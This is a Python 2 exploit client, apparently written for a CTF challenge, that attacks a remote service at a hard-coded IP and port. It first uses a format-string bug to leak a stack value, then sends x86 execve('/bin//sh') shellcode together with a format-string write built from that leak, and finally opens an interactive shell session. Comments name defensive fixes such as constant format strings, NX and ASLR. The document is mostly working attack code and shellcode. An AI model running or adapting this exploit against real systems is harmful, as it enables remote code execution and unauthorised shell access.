# nobug.py — exploit client for a remote CTF-style service that reads
# base64-encoded lines.  Two requests are made: the first abuses a
# format-string bug to leak a stack value, the second sends shellcode plus a
# format-string write derived from that leak.
#
# Written for Python 2: the str literals below are raw bytes and
# base64.b64encode() accepts str; under Python 3 each payload would have to
# be bytes.
#
# Defensive takeaways: the bug class is attacker-controlled input reaching a
# printf-style function as the *format* argument (fixed by passing a constant
# format, e.g. printf("%s", buf), and compiling with -Wformat-security); the
# second stage additionally relies on an executable, predictable stack, which
# NX and ASLR remove.
from pwnpwnpwn import *  # make_conn, sendline, recvuntil, fmtchar, inter — helper library not shown on this page
import base64
 
host = "180.76.178.48"
port = 8888
 
sock = make_conn(host,port)
 
# Stage 1: "%12$p" makes the vulnerable format call print its 12th positional
# argument as a pointer; the reply is parsed as hex below.
payload = "%12$p"
payload = base64.b64encode(payload)  # presumably the service base64-decodes each line — confirm against the target
sendline(sock,payload)
data = recvuntil(sock,"\n")
ebp = int(data.split("\n")[0],16)  # first reply line as hex; the name suggests a saved frame pointer — not verifiable here
 
# Stage 2: 25 bytes of x86 shellcode (the "/bin//sh" string is visible in the
# escapes), padded with "a" to 60 bytes so the fmtchar() output starts at
# offset 60 of the line.
payload = "\x31\xd2\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
payload = payload.ljust(60,"a")
# Low byte of (leaked value + 0xC4); the constants encode a stack-layout
# assumption specific to the target binary.
word = (ebp+0X54+0X70) & 0xff
# fmtchar() is opaque from here — presumably builds a format-string write of
# `word`, with 60 being the number of bytes already emitted; confirm against
# the pwnpwnpwn source.
payload += fmtchar(60,word,4)
payload = base64.b64encode(payload)
sendline(sock,payload)
 
 
inter(sock)  # hand the socket over to an interactive session